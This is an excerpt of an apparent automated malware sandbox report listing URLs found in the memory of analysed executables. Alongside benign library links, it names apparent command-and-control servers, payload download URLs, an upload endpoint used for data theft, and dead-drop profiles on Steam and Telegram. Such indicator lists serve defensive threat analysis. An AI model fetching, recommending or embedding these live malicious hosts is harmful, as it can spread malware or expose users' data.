                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.php9
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.phpRCHAR
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.phpr
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-admin.phps
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/api/wp-ping.php
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/g
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190/j
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-admin.php
                              Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-admin.phpows
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.216.188.190:80/api/wp-ping.php
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aka.ms/msal-net-iwa
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://aka.ms/valid-authorities
                              Source: LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                              Source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueshttp://schemas.xmlsoap.org/ws/2005/05/identity/NoP
                              Source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/shttp://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702iht
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/d
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/v.
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/v1/upload.php
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001301000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814299974.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/v1/upload.php)=
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814803849.0000000001321000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/v1/upload.php1
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tventyvf20pt.top/v1/upload.phpT
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.innosetup.com/
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exe, kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/ps
                              Source: kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.remobjects.com/psU
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDllm_object
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/adal_token_cache_serialization
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-brokers
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-brokers.
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-client-apps
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-interactive-android
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-2-released)
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3-breaking-changes
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3-breaking-changesShttps://login.microsoftonline.com/common/
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3-breaking-changesy
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-change)
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-3x-cache-breaking-changeC
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-application-configuration
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-b2c
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-brokers
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-enable-keychain-access
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-enable-keychain-groups
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-iwa
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-system-browsers
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-up
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/msal-net-up)
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/net-cache-persistence-errors.
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change
                              Source: RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/;
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/?format=json
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org/?format=jsonO
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api64.ipify.org:443/?format=json
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/F
                              Source: RegAsm.exe, 00000002.00000002.1669605401.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/&
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/9
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exee
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exein
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exeovider
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exe
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exek
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://enterpriseregistration.windows.net/
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gcc.gnu.org/bugs/):
                              Source: RegAsm.exeString found in binary or memory: https://ipgeolocation.io/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/s
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33Gn
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33_
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/$
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nhuM4.js
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1nhuM4.jsm
                              Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org:443/1nhuM4.jsx
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://login.microsoftonline.com/common
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://login.microsoftonline.com/common/
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://login.microsoftonline.com=https://login.chinacloudapi.cnAhttps://login.microsoftonline.deAht
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/sdhsfd.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/sdhsfd.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/sdhsfd.exez
                              Source: RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.00000000045A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vfsdgdf.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vfsdgdf.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vfsdgdf.exeY2=
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe
                              Source: RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe3t
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vsfdhgg15.exe705d09
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe/vsfdhgg15.exeC:
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/5.44.104/prog/66e705d09b33c_jack.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/sdhsfd.exe
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/sdhsfd.exei
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/sdhsfd.exelfb
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/sdhsfd.exe~at
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/vfsdgdf.exe
                              Source: RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/vfsdgdf.exe6f
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exe
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exe2
                              Source: RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nerv.com.pe:80/vsfdhgg15.exeg
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oob
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                              Source: JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://update-ledger.net/update
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                              Source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
